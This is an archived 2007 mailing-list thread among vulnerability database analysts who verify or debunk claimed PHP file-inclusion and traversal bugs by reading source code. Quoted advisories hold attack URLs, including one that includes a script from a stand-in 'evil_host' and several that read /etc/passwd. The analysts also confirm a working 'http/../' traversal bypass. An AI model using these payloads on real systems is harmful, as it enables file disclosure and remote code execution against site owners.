'textFile' or 'textfile' turn up anything. So, where's the mistake? In the Bugtraq entry itself? With SekoMirza? Or perhaps just on my end? George -- theall at tenablesecurity.com From jericho at attrition.org Wed Apr 18 17:35:25 2007 From: jericho at attrition.org (security curmudgeon) Date: Wed, 18 Apr 2007 17:35:25 +0000 (UTC) Subject: [VIM] UK ISP threatens security researcher (fwd) Message-ID: Until Steve and/or I can find a lot of spare time to write various things on our to-do lists regarding disclosure and vendor reaction, cross posting this here for our reference down the road. ---------- Forwarded message ---------- From: Gadi Evron To: full-disclosure at lists.grok.org.uk Cc: funsec at linuxbox.org Date: Tue, 17 Apr 2007 18:30:54 -0500 (CDT) Subject: [funsec] UK ISP threatens security researcher http://www.theregister.com/2007/04/17/hackers_service_terminated/ "A 21-year-old college student in London had his internet service terminated and was threatened with legal action after publishing details of a critical vulnerability that can compromise the security of the ISP's subscribers." From coley at mitre.org Thu Apr 19 08:17:08 2007 From: coley at mitre.org (Steven M. Christey) Date: Thu, 19 Apr 2007 04:17:08 -0400 (EDT) Subject: [VIM] [uncertain] (mostly) phpFaber TopSitespath traversal Message-ID: <200704190817.l3J8H8ew015528@faron.mitre.org> Who: Dr.RoVeR Where: BUGTRAQ:20070411 nEw Bug :D URL:http://www.securityfocus.com/archive/1/archive/1/465339/100/100/threaded The researcher quotes a couple lines from index.php, but this is a red herring; these lines only set "page" to a static value when the provided parameter is missing or invalid. template.php (reachable through the "template" page in admin/index.php) in the provided download has: if ($_GET['modify']) $_GET['modify'] = basename($_GET['modify']); but then later we have: elseif($files[$_GET['modify']]){ if(!$files[$_GET['modify']]) $err_msg = "Please select file"; else{ $fn = PATH_SITE.$files[$_GET['modify']]; $content = PrepareTplData(cpReadFile($fn)); } } and $fn is later used in an include. HOWEVER... on first glance, it seems like $files might be a whitelist, and $files is not specified in the attack url, so this conditional might not be satisfied. But given that the researcher quoted the entirely wrong section of code, this doesn't look like a grep-and-gripe situation, so maybe I'm missing something. extra.php looks like it might have something: $fn = PATH_SITE.$path.$_GET['modify']; $content = cpReadFile($fn); but I don't see this being directly included by template.php. So, I'm a little mixed here. - Steve From gmdarkfig at gmail.com Fri Apr 20 17:58:15 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Fri, 20 Apr 2007 19:58:15 +0200 Subject: [VIM] [uncertain] (mostly) phpFaber TopSitespath traversal In-Reply-To: <200704190817.l3J8H8ew015528@faron.mitre.org> References: <200704190817.l3J8H8ew015528@faron.mitre.org> Message-ID: Hi Steven M. Christey =) Quote from the thread: >#Exploit:/Path/admin/index.php?page=template&modify=../../../../../../etc/passwd >#Exploit:/Path/admin/index.php?page=template&modify=inc/config.ini.php ./admin/template.php: $_GET['modify'] = basename($_GET['modify']); [...] $f = array(); $files = cpGetFldContentFiles(true,PATH_TPL); foreach($files as $k=>$v) $f[FLD_TPL.$v] = $v; $files = cpGetFldContentFiles(true,PATH_LNG); foreach($files as $k=>$v) $f[FLD_TPL.FLD_LNG_.$v] = $v; $files = cpGetFldContentFiles(true); $skin = $ini->read('APPLICATION', 'skin').'/'; foreach($files as $k=>$v) $f[FLD_SKIN.$skin.$v] = $v; $files = $f; $files = array_flip($files); [...] elseif($files[$_GET['modify']]){ if(!$files[$_GET['modify']]) $err_msg = "Please select file"; else{ $fn = PATH_SITE.$files[$_GET['modify']]; $content = PrepareTplData(cpReadFile($fn)); } [...] function PrepareTplData($s, $back = false) { if (!$back) { $s = htmlspecialchars($s); return $s; } else { $s = stripslashes($s); return ReverseHtmlchars($s); } } ./inc/lib/lib.inc.php: function cpReadFile($fn){ return @implode('', at file($fn)); } This can lead to file disclosure, but this can't be exploited. You can't use ../ because basename() is applied to $_GET['modify'] and the malicious value is not in the array $files, so this is not vulnerable to these exploits. Tested. 2007/4/19, Steven M. Christey : > > Who: Dr.RoVeR > Where: BUGTRAQ:20070411 nEw Bug :D > URL:http://www.securityfocus.com/archive/1/archive/1/465339/100/100/threaded > > The researcher quotes a couple lines from index.php, but this is a red > herring; these lines only set "page" to a static value when the > provided parameter is missing or invalid. > > template.php (reachable through the "template" page in > admin/index.php) in the provided download has: > > if ($_GET['modify']) $_GET['modify'] = basename($_GET['modify']); > > but then later we have: > > elseif($files[$_GET['modify']]){ > if(!$files[$_GET['modify']]) $err_msg = "Please select file"; > else{ > $fn = PATH_SITE.$files[$_GET['modify']]; > $content = PrepareTplData(cpReadFile($fn)); > } > } > > and $fn is later used in an include. > > HOWEVER... on first glance, it seems like $files might be a whitelist, > and $files is not specified in the attack url, so this conditional > might not be satisfied. > > But given that the researcher quoted the entirely wrong section of > code, this doesn't look like a grep-and-gripe situation, so maybe I'm > missing something. extra.php looks like it might have something: > > $fn = PATH_SITE.$path.$_GET['modify']; > $content = cpReadFile($fn); > > but I don't see this being directly included by template.php. > > So, I'm a little mixed here. > > - Steve > From coley at linus.mitre.org Sun Apr 22 19:16:48 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Sun, 22 Apr 2007 15:16:48 -0400 (EDT) Subject: [VIM] vendor ack/clarification for CVE-2007-1888 (SQLite) Message-ID: key points: only version 2 is affected, which is an older version that isn't used very much, except by PHP; and the relevant function was not intended to handle attacker-controlled inputs. ---------- Forwarded message ---------- Date: Thu, 19 Apr 2007 16:00:26 +0000 Subject: CVE-2007-1888 Gentle People, I am the original author and the principal architect of the SQLite embedded database engine referenced in CVS-2007-1888. I have not been contacted about this alleged vulnerability. I discovered it while doing a Google search. I have investigated the bug and have the following findings: * The alleged bug occurs in the source file "encode.c". That file was removed from the SQLite source tree in September of 2004. That file and the operations it encodes are no longer a part of SQLite. Legacy versions of SQLite that make use of this old file are still available, but the use of those legacy versions is discouraged. As far as we are aware, PHP is the only software still using this archaic version of SQLite. * The vulnerability in question is arguably a case of PHP misusing the sqlite_decode_binary() API. While it is true that sqlite_decode_binary() might be made more robust in the face of malformed inputs, sqlite_decode_binary() was never intended to be used in that context. This bug applies to SQLite version 2 only, and then only to very specific and narrow uses of SQLite version 2. There are countless users of SQLite in the wild, but apart from PHP, they are almost all SQLite 3 users. This bug has zero impact on the overwhelming majority of SQLite users. In order to avoid unnecessarily alarming the many users of SQLite version 3, in any official announcement of this vulnerability, you should make it clear that the vulnerability only applies to SQLite version 2 and then only to users who make use of the sqlite_decode_binary() function with an unchecked input. Thanks. From str0ke at milw0rm.com Sun Apr 22 19:30:22 2007 From: str0ke at milw0rm.com (str0ke) Date: Sun, 22 Apr 2007 14:30:22 -0500 Subject: [VIM] false: turbolence core 0.0.1 alpha Remote File Inclusion Message-ID: <814b9d50704221230gbfd792bp8911d402c075ecce@mail.gmail.com> Since the tdb_connect function doesn't exist in the script (or included in the script) it will die with a fatal error. /str0ke ---------- Forwarded message ---------- From: omnipresent at email.it Date: 21 Apr 2007 10:55:11 -0000 Subject: turbolence core 0.0.1 alpha Remote File Inclusion To: bugtraq at securityfocus.com . . . ._ | _. .|_ _. _.;_/ [_)|(_]\_|[ )(_](_.| \.net | ._| "turbulence core.0.0.1-alpha - REMOTE FILE INCLUSION" by Omni 1) Infos --------- Date : 2007-04-20 Product : turbulence core Version : 0.0.1 alpha Vendor : http://sourceforge.net/projects/turbulence Vendor Status : 2007-04-20 -> Not Informed! 2007-04-21 -> Vendor Informed! Description : PHP Turbulence is a suite of PHP scripts that work together in unison. They do not require one another to be present, but work perfect together. The intent of the project is to eliminate the need to download a PHP message board, PHP news, PHP user managment. Source : omnipresent - omni E-mail : omnipresent @ email . it - omni @ playhack . net Team : Playhack.net Security 2) Security Issues ------------------- --- [ Remote File Inclusion Vulnerability ] --- =============================================== [ /user/turbolence.php - Line 34 - 39 ] [...] $tdbconn = tdb_connect($GLOBALS['tdb']); if (!$tdbconn) decho("Database Connection Failed..."); decho("Database Connection: ".$tdbconn); include($GLOBALS['tcore'].'/user/session.inc'); if ($GLOBALS['login']) { [...] [ end script turbolence.php ] As you can see the variable $GLOBALS['tcode'] is not properly sanitized before being used; so an attacker can gain access to the shell by using a crafted URL. --- [ PoC ] --- =============== Tested on a php.ini configuration as the follow: register_global = On allow_url_unclude = On RFI: http://127.0.0.1/user/turbulence.php?GLOBALS[tcore]=http://evil_host/evil_script.txt? LFI: http://127.0.0.1/turbulence.php?GLOBALS[tcore]=../../../../../../../../../../../../etc/passwd%00 ---- [ Patch ] ---- 1. Edit the source code to ensure that the input is validated. 2. To avoid Remote File Inclusion turn Off allow_url_include. From theall at tenablesecurity.com Mon Apr 23 20:40:32 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 23 Apr 2007 16:40:32 -0400 Subject: [VIM] Almost: claroline <= Multiple Remote File Include Vulnerablitiy Message-ID: <462D19C0.4070509@tenablesecurity.com> Anyone else seem this (BID 23609)? http://www.securityfocus.com/archive/1/466661/30/0/threaded Looking at the code from http://www.e-learningone.it/software_free/e-learning/claroline175.zip, I don't see a file named 'rootSys' in 'claroline/inc/lib'. Nor does it seem like the flaw lies in the 'index.php' file in that directory -- it has one executable line of code: header("Location:../../../"); There is, though, a file named 'export_exe_tracking.class.php' that is probably what he was talking about. Its first non-comment line is: include_once($rootSys.$clarolineRepositoryAppend.'exercice/question.class.php'); And the issue was corrected with some patches on 10 May 2006; ie, http://www.claroline.net/wiki/index.php/Talk:Manual_security_hack_in_1.6_and_1.7 George -- theall at tenablesecurity.com From coley at mitre.org Wed Apr 25 16:13:44 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 25 Apr 2007 12:13:44 -0400 (EDT) Subject: [VIM] [false but true] "Allfaclassfieds" RFI no; PHP Classifieds yes Message-ID: <200704251613.l3PGDipF017520@faron.mitre.org> Researcher: Dr.RoVeR Ref: Allfaclassfieds (level2.php dir) remote file inclusion http://www.securityfocus.com/archive/1/archive/1/466648/100/0/threaded With a name like "allfaclassfieds" that smelled like a typo, I investigated a little bit more. The referenced download URL creates a directory "phpclassifides". No mention of "allfa" is anywhere according to grep. Further grep finds this to be PHP Classifieds. The presence of a "upgr_603_to_604.php" file, and most files dating back to 2001, along with UPGRADE.txt, suggests an old version of 6.04; latest version, released on April 14, is 7.2b. The relevant RFI code does not appear in level2.php in the newer version. But, admin/setup/level2.php in 6.04, we have: require("$dir/admin/db.php"); as the first executable PHP code. The installation appears to move from level1.php through level5.php; the latter deletes the install file. However, there's not any evidence that the level*.php files are ever cleaned up, leaving them open for later access. - Steve From coley at mitre.org Wed Apr 25 18:10:50 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 25 Apr 2007 14:10:50 -0400 (EDT) Subject: [VIM] [true] Quick and Dirty Blog RFI Message-ID: <200704251810.l3PIAoUK021190@faron.mitre.org> Ref: MILW0RM:3729 Researcher: Omni Verified by a CVE analyst using source inspection. Post mentions "index.php" but the relevant lines are in categories.php. The lines quoted by the researcher are the first executable lines in the file. - Steve From theall at tenablesecurity.com Thu Apr 26 00:14:59 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Wed, 25 Apr 2007 20:14:59 -0400 Subject: [VIM] False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure Message-ID: <462FEF03.1020802@tenablesecurity.com> Someone help me out please... Milw0rm 3800 / Bugtraq 23643 are for a flaw that looks like a directory traversal; ie, Exploit:[Path_ext]/examples/layout/feed-proxy.php?feed=../../../../../../etc/passwd Yet when I look at the code from either version 1.0 alpha 1 (from ), which is supposedly affected, or 1.0 (from ), the latest version, the affected file has the following code: $feed = $_REQUEST['feed']; if($feed != '' && strpos($feed, 'http') === 0){ header('Content-Type: text/xml'); readfile($feed); return; } Now doesn't the strpos() along with the "===" test mean that the feed parameter must start with "http"??? So did Alkomandoz Hacker bother to test his/her proof of concept??? Now I suppose if the remote has allow_url_fopen enabled, you might be able to abuse this to try to hide yourself from attacks against third-party sites, but that's a separate issue. George -- theall at tenablesecurity.com From coley at linus.mitre.org Thu Apr 26 00:36:47 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed, 25 Apr 2007 20:36:47 -0400 (EDT) Subject: [VIM] False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure In-Reply-To: <462FEF03.1020802@tenablesecurity.com> References: <462FEF03.1020802@tenablesecurity.com> Message-ID: On Wed, 25 Apr 2007, George A. Theall wrote: > if($feed != '' && strpos($feed, 'http') === 0){ > header('Content-Type: text/xml'); > readfile($feed); > return; > } > > Now doesn't the strpos() along with the "===" test mean that the feed > parameter must start with "http"??? So did Alkomandoz Hacker bother to > test his/her proof of concept??? Just guessing here... http://us2.php.net/manual/en/function.strpos.php says that strpos "may return Boolean FALSE, but may also return a non-Boolean value which evaluates to FALSE, such as 0". The question then becomes how "===" is handled, and whether it's handled uniformly across all PHP versions and configs. BUT... There's still an issue if you do this: http/../../../../etc/passwd would pass the test and be useful as a directory traversal attack. (I verified that my PHP 4.4.4 will accept an "up-and-down" traversal with a non-existent subdirectory. This usually works in other traversal scenarios too, not just PHP.) There's a possibility that $feed is processed elsewhere, but I didn't look at the code. > Now I suppose if the remote has allow_url_fopen enabled, you might be > able to abuse this to try to hide yourself from attacks against > third-party sites, but that's a separate issue. readfile() with a URL can also be used for XSS, although people concentrate so much on RFI that they don't bother pointing this out. You bring up a very interesting attack angle for attacks against third-party sites - readfile() as an attack proxy. I LOVE it! Wonder if it's being used in real-world attacks. PHP, oh PHP, the intricate beauty of your gifts is eternal. - Steve From theall at tenablesecurity.com Thu Apr 26 01:06:49 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Wed, 25 Apr 2007 21:06:49 -0400 Subject: [VIM] False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure In-Reply-To: References: <462FEF03.1020802@tenablesecurity.com> Message-ID: <462FFB29.7070306@tenablesecurity.com> On 04/25/07 20:36, Steven M. Christey wrote: > says that strpos "may return Boolean FALSE, but may also return a > non-Boolean value which evaluates to FALSE, such as 0". The question then > becomes how "===" is handled, and whether it's handled uniformly across > all PHP versions and configs. It's a PHP 4+ thingy -- the two arguments must compare equal *and* be of the same type. AFAIK, its behaviour doesn't depend on any configuration settings. > There's still an issue if you do this: > > http/../../../../etc/passwd > > would pass the test and be useful as a directory traversal attack. > > (I verified that my PHP 4.4.4 will accept an "up-and-down" traversal with > a non-existent subdirectory. This usually works in other traversal > scenarios too, not just PHP.) I think that works under Windows but not *nix. > There's a possibility that $feed is processed elsewhere, but I didn't look > at the code. I quoted all of it before, only leaving out a comment and the PHP tags at the start / end. George -- theall at tenablesecurity.com From coley at linus.mitre.org Thu Apr 26 01:19:19 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed, 25 Apr 2007 21:19:19 -0400 (EDT) Subject: [VIM] False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure In-Reply-To: <462FFB29.7070306@tenablesecurity.com> References: <462FEF03.1020802@tenablesecurity.com> <462FFB29.7070306@tenablesecurity.com> Message-ID: On Wed, 25 Apr 2007, George A. Theall wrote: > > (I verified that my PHP 4.4.4 will accept an "up-and-down" traversal with > > a non-existent subdirectory. This usually works in other traversal > > scenarios too, not just PHP.) > > I think that works under Windows but not *nix. For PHP anyway, it works like a charm on my Solaris box. $feed = "http/../../../test.txt"; if($feed != '' && strpos($feed, 'http') === 0){ readfile($feed); } (where test.txt is my default directory traversal test file, and the PHP app's location doesn't have an http subdirectory). That said, I vaguely remember running across situations where a non-existent subdirectory would prevent an attack from working; maybe there are variations depending on whether realpath() is used or not? - Steve From theall at tenablesecurity.com Thu Apr 26 02:01:45 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Wed, 25 Apr 2007 22:01:45 -0400 Subject: [VIM] False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure In-Reply-To: References: <462FEF03.1020802@tenablesecurity.com> <462FFB29.7070306@tenablesecurity.com> Message-ID: <46300809.9090001@tenablesecurity.com> On 04/25/07 21:19, Steven M. Christey wrote: > For PHP anyway, it works like a charm on my Solaris box. > > $feed = "http/../../../test.txt"; > if($feed != '' && strpos($feed, 'http') === 0){ > readfile($feed); > } > > (where test.txt is my default directory traversal test file, and the PHP > app's location doesn't have an http subdirectory). Hmmm, I didn't realize Solaris behaved this way. > That said, I vaguely remember running across situations where a > non-existent subdirectory would prevent an attack from working; maybe > there are variations depending on whether realpath() is used or not? I figured it was more of an OS feature; eg, try something like: ls foo/../../../../../ (*nix) dir foo\..\..\..\..\..\..\ (Windows) from a directory not too far off root. Btw, I just tried this on Solaris 10 -- it produced an error rather than a directory listing. George -- theall at tenablesecurity.com From noamr at beyondsecurity.com Thu Apr 26 07:37:30 2007 From: noamr at beyondsecurity.com (Noam Rathaus) Date: Thu, 26 Apr 2007 10:37:30 +0300 Subject: [VIM] [UNKNOWN] WordPress v2.1.3 >> remote file include~ Message-ID: <200704261037.30597.noamr@beyondsecurity.com> Hi, I am unable to confirm this, anyone? Looks fake, and untrue, wp-settings.php doesn't use anything called require_once? weird ---------- Forwarded Message ---------- Subject: WordPress v2.1.3 >> remote file include~ Date: Wednesday 25 April 2007 11:17 From: s433d_only_linux at yahoo.de To: bugtraq at securityfocus.com by : www.hackeraz.ir userz , saeid... ++++++++++++++++++++++++++++++++++++ #################################################### #WordPress >> 2.1.3 Remote File Inclusion # #################################################### Affected Software .: WordPress >> 2.1.3 # Download..: http://wordpress-deutschland.org # Risk ..............: high # Date .........: 25/4/2007 # Found by ..........: s433d_only_linux # Contact ...........: s433d_only_linux at yahoo.de # Web .............: Www.hackerz.ir # special thanx ........... Ali Jasbi my beste friend# #################################################### Affected File: # wordpress/wp-settings.php # wordpress/wp-includes/template-loader.php # wordpress/wp-includes/theme.php # #################################################### Exploit: wordpress/wp-settings.php?require_once=shell? wordpress/wp-includes/template-loader.php?include=shell? wordpress/wp-includes/theme.php?require_once=shell? ###################################################### ------------------------------------------------------- -- ? Noam Rathaus ? CTO ? 1616 Anderson Rd. ? McLean, VA 22102 ? Tel: 703.286.7725 extension 105 ? Fax: 888.667.7740 ? noamr at beyondsecurity.com ? http://www.beyondsecurity.com From heinbockel at mitre.org Thu Apr 26 12:19:48 2007 From: heinbockel at mitre.org (Heinbockel, Bill) Date: Thu, 26 Apr 2007 08:19:48 -0400 Subject: [VIM] FALSE --> RE: [UNKNOWN] WordPress v2.1.3 >> remote file include~ In-Reply-To: <200704261037.30597.noamr@beyondsecurity.com> References: <200704261037.30597.noamr@beyondsecurity.com> Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC01C6B001@IMCSRV5.MITRE.ORG> Looks like someone is using untested automated tools that report the wrong issue, or is totally clueless: >From Wordpress 2.1.3: $ grep -n -i require_once wp-settings.php 100: require_once (ABSPATH . WPINC . '/wp-db.php 140:require_once (ABSPATH . WPINC . '/l10n.php'); 247: require_once($locale_file); 250:require_once(ABSPATH . WPINC . '/locale.php'); The only parameter here that *might* be vulnerable is $local_file arount line 247: $locale = get_locale(); $locale_file = ABSPATH . LANGDIR . "/$locale.php"; if ( is_readable($locale_file) ) require_once($locale_file); In wp-includes/l10n.php: function get_locale() { global $locale; if (isset($locale)) return apply_filters( 'locale', $locale ); // WPLANG is defined in wp-config. if (defined('WPLANG')) $locale = WPLANG; if (empty($locale)) $locale = ''; $locale = apply_filters('locale', $locale); return $locale; } So, if WPLANG is not defined and the $locale value is able to bypass whatever filters are defined in apply_filters, a PoC like "wordpress/wp-settings.php?locale=shell?" MAY work. Other than that, everything in wp-includes/themes.php is contained within a function declaration and wp-includes/template-loader.php looks be okay. Just another incompetent vulnerability researcher posting bogus reports. Why must PHP punish us so? ;-) William Heinbockel Infosec Engineer, Sr. The MITRE Corporation 202 Burlington Rd. MS S145 Bedford, MA 01730 heinbockel at mitre.org 781-271-2615 >-----Original Message----- >From: vim-bounces at attrition.org >[mailto:vim-bounces at attrition.org] On Behalf Of Noam Rathaus >Sent: Thursday, 26 April, 2007 03:38 >To: Vulnerability Information Managers >Subject: [VIM] [UNKNOWN] WordPress v2.1.3 >> remote file include~ > >Hi, > >I am unable to confirm this, anyone? > >Looks fake, and untrue, wp-settings.php doesn't use anything called >require_once? weird > >---------- Forwarded Message ---------- > >Subject: WordPress v2.1.3 >> remote file include~ >Date: Wednesday 25 April 2007 11:17 >From: s433d_only_linux at yahoo.de >To: bugtraq at securityfocus.com > >by : www.hackeraz.ir userz , saeid... >++++++++++++++++++++++++++++++++++++ >#################################################### >#WordPress >> 2.1.3 Remote File Inclusion # >#################################################### >Affected Software .: WordPress >> 2.1.3 # >Download..: http://wordpress-deutschland.org # >Risk ..............: high # >Date .........: 25/4/2007 # >Found by ..........: s433d_only_linux # >Contact ...........: s433d_only_linux at yahoo.de # >Web .............: Www.hackerz.ir # >special thanx ........... Ali Jasbi my beste friend# >#################################################### >Affected File: # >wordpress/wp-settings.php # >wordpress/wp-includes/template-loader.php # >wordpress/wp-includes/theme.php # >#################################################### >Exploit: >wordpress/wp-settings.php?require_once=shell? >wordpress/wp-includes/template-loader.php?include=shell? >wordpress/wp-includes/theme.php?require_once=shell? >###################################################### > >------------------------------------------------------- > >-- >? Noam Rathaus >? CTO >? 1616 Anderson Rd. >? McLean, VA 22102 >? Tel: 703.286.7725 extension 105 >? Fax: 888.667.7740 >? noamr at beyondsecurity.com >? http://www.beyondsecurity.com > From str0ke at milw0rm.com Thu Apr 26 13:39:03 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 26 Apr 2007 08:39:03 -0500 Subject: [VIM] False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure In-Reply-To: <46300809.9090001@tenablesecurity.com> References: <462FEF03.1020802@tenablesecurity.com> <462FFB29.7070306@tenablesecurity.com> <46300809.9090001@tenablesecurity.com> Message-ID: <814b9d50704260639m74923caewa29fd2f7373f1b21@mail.gmail.com> Tested with php4 + debian latest and worked just fine. /str0ke On 4/25/07, George A. Theall wrote: > On 04/25/07 21:19, Steven M. Christey wrote: > > > For PHP anyway, it works like a charm on my Solaris box. > > > > $feed = "http/../../../test.txt"; > > if($feed != '' && strpos($feed, 'http') === 0){ > > readfile($feed); > > } > > > > (where test.txt is my default directory traversal test file, and the PHP > > app's location doesn't have an http subdirectory). > > Hmmm, I didn't realize Solaris behaved this way. > > > That said, I vaguely remember running across situations where a > > non-existent subdirectory would prevent an attack from working; maybe > > there are variations depending on whether realpath() is used or not? > > I figured it was more of an OS feature; eg, try something like: > > ls foo/../../../../../ (*nix) > dir foo\..\..\..\..\..\..\ (Windows) > > from a directory not too far off root. > > Btw, I just tried this on Solaris 10 -- it produced an error rather than > a directory listing. > > George > -- > theall at tenablesecurity.com > From str0ke at milw0rm.com Thu Apr 26 13:41:27 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 26 Apr 2007 08:41:27 -0500 Subject: [VIM] False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure In-Reply-To: <814b9d50704260639m74923caewa29fd2f7373f1b21@mail.gmail.com> References: <462FEF03.1020802@tenablesecurity.com> <462FFB29.7070306@tenablesecurity.com> <46300809.9090001@tenablesecurity.com> <814b9d50704260639m74923caewa29fd2f7373f1b21@mail.gmail.com> Message-ID: <814b9d50704260641m2a6306a5p337bb61a3274cf06@mail.gmail.com> Tested with php5 + fedora works as well. /str0ke On 4/26/07, str0ke wrote: > Tested with php4 + debian latest and worked just fine. > > /str0ke > > On 4/25/07, George A. Theall wrote: > > On 04/25/07 21:19, Steven M. Christey wrote: > > > > > For PHP anyway, it works like a charm on my Solaris box. > > > > > > $feed = "http/../../../test.txt"; > > > if($feed != '' && strpos($feed, 'http') === 0){ > > > readfile($feed); > > > } > > > > > > (where test.txt is my default directory traversal test file, and the PHP > > > app's location doesn't have an http subdirectory). > > > > Hmmm, I didn't realize Solaris behaved this way. > > > > > That said, I vaguely remember running across situations where a > > > non-existent subdirectory would prevent an attack from working; maybe > > > there are variations depending on whether realpath() is used or not? > > > > I figured it was more of an OS feature; eg, try something like: > > > > ls foo/../../../../../ (*nix) > > dir foo\..\..\..\..\..\..\ (Windows) > > > > from a directory not too far off root. > > > > Btw, I just tried this on Solaris 10 -- it produced an error rather than > > a directory listing. > > > > George > > -- > > theall at tenablesecurity.com > > > From theall at tenablesecurity.com Thu Apr 26 14:03:24 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Thu, 26 Apr 2007 10:03:24 -0400 Subject: [VIM] False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure In-Reply-To: <814b9d50704260641m2a6306a5p337bb61a3274cf06@mail.gmail.com> References: <462FEF03.1020802@tenablesecurity.com> <462FFB29.7070306@tenablesecurity.com> <46300809.9090001@tenablesecurity.com> <814b9d50704260639m74923caewa29fd2f7373f1b21@mail.gmail.com> <814b9d50704260641m2a6306a5p337bb61a3274cf06@mail.gmail.com> Message-ID: <4630B12C.8060005@tenablesecurity.com> On 04/26/07 09:41, str0ke wrote: > Tested with php5 + fedora works as well. Interesting behaviour... it seems to be something special about readfile() as replacing that with, say, include(), reports no such file / directory. George -- theall at tenablesecurity.com From str0ke at milw0rm.com Thu Apr 26 14:15:59 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 26 Apr 2007 09:15:59 -0500 Subject: [VIM] False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure In-Reply-To: <4630B12C.8060005@tenablesecurity.com> References: <462FEF03.1020802@tenablesecurity.com> <462FFB29.7070306@tenablesecurity.com> <46300809.9090001@tenablesecurity.com> <814b9d50704260639m74923caewa29fd2f7373f1b21@mail.gmail.com> <814b9d50704260641m2a6306a5p337bb61a3274cf06@mail.gmail.com> <4630B12C.8060005@tenablesecurity.com> Message-ID: <814b9d50704260715x766807ban9f37e611e9eb209c@mail.gmail.com> On 4/26/07, George A. Theall wrote: > On 04/26/07 09:41, str0ke wrote: > > > Tested with php5 + fedora works as well. > > Interesting behaviour... it seems to be something special about > readfile() as replacing that with, say, include(), reports no such file > / directory. Yeppers. Seems readfile doesn't care if local directories exist or not. getcwd("/var/www/html", 4096) = 14 lstat64("/var", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat64("/var/www", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat64("/var/www/html", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat64("/var/www/html/http", 0xbfb47c6c) = -1 ENOENT (No such file or directory) open("/etc/passwd", O_RDONLY) = 3 /str0ke From coley at linus.mitre.org Thu Apr 26 17:43:57 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Thu, 26 Apr 2007 13:43:57 -0400 (EDT) Subject: [VIM] False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure In-Reply-To: <4630B12C.8060005@tenablesecurity.com> References: <462FEF03.1020802@tenablesecurity.com> <462FFB29.7070306@tenablesecurity.com> <46300809.9090001@tenablesecurity.com> <814b9d50704260639m74923caewa29fd2f7373f1b21@mail.gmail.com> <814b9d50704260641m2a6306a5p337bb61a3274cf06@mail.gmail.com> <4630B12C.8060005@tenablesecurity.com> Message-ID: On Thu, 26 Apr 2007, George A. Theall wrote: > Interesting behaviour... it seems to be something special about > readfile() as replacing that with, say, include(), reports no such file > / directory. Yeah, same thing on Solaris - include() fails where readfile() passes. - Steve From gmdarkfig at gmail.com Thu Apr 26 18:39:01 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Thu, 26 Apr 2007 20:39:01 +0200 Subject: [VIM] False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure In-Reply-To: References: <462FEF03.1020802@tenablesecurity.com> <462FFB29.7070306@tenablesecurity.com> <46300809.9090001@tenablesecurity.com> <814b9d50704260639m74923caewa29fd2f7373f1b21@mail.gmail.com> <814b9d50704260641m2a6306a5p337bb61a3274cf06@mail.gmail.com> <4630B12C.8060005@tenablesecurity.com> Message-ID: I think these functions do something like this: - If $array[$x] == '..' and $array[$x-1] != .. then replace '/../' by ''. So readfile('xd/../yuh/../hello.php); is the same as readfile('hello.php'); > > Interesting behaviour... it seems to be something special about > > readfile() as replacing that with, say, include(), reports no such file > > / directory. For me, with include() i have the same results (Windows): C:\Documents and Settings\root\Desktop>cat a.php C:\Documents and Settings\root\Desktop>cat c:/file.php From jericho at attrition.org Thu Apr 26 20:22:38 2007 From: jericho at attrition.org (security curmudgeon) Date: Thu, 26 Apr 2007 20:22:38 +0000 (UTC) Subject: [VIM] Dup: Gallery 1.2.5 (GALLERY_BASEDIR) Multiple RFI Vulnerabilities In-Reply-To: <4623C487.5050703@tenablesecurity.com> References: <4623C487.5050703@tenablesecurity.com> Message-ID: : The issues covered by Milw0rm 3743 / Bugtraq 23502 are a subset of those : posted back in 2002 by avart at gmx.de; eg, : : http://archives.neohapsis.com/archives/bugtraq/2002-07/0471.html : : and covered by CVE-2002-1412 / Bugtraq 5375. Or am I missing something? back when most of us called it 'command execution' and hadn't started commonly calling this RFI =) http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-1412 Gallery photo album package before 1.3.1 allows local and possibly remote attackers to execute arbitrary code via a modified GALLERY_BASEDIR variable that points to a directory or URL that contains a Trojan horse init.php script. (the associated mail list post shows the RFI vuln in captionator.php and references the vendor fix for errors/configmode.php, errors/needinit.php, errors/reconfigure.php, errors/unconfigured.php.) http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-2123 PHP remote file inclusion vulnerability in publish_xp_docs.php for Gallery 1.3.2 allows remote attackers to inject arbitrary PHP code by specifying a URL to an init.php file in the GALLERY_BASEDIR parameter. http://www.securityfocus.com/bid/23502/exploit http://www.example.com/errors/needinit.php?GALLERY_BASEDIR=Shell http://www.example.com/errors/reconfigure.php?GALLERY_BASEDIR=Shell http://www.example.com/errors/unconfigured.php?GALLERY_BASEDIR=Shell http://www.example.com/errors/configmode.php?GALLERY_BASEDIR=Shell (the four vendor mentioned files) http://milw0rm.com/exploits/3743 # 